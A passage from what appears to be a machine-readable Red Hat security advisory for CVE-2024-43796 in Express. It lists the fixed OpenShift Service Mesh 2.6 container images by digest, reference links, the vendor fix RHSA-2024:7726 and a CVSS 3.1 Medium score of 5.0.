purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", 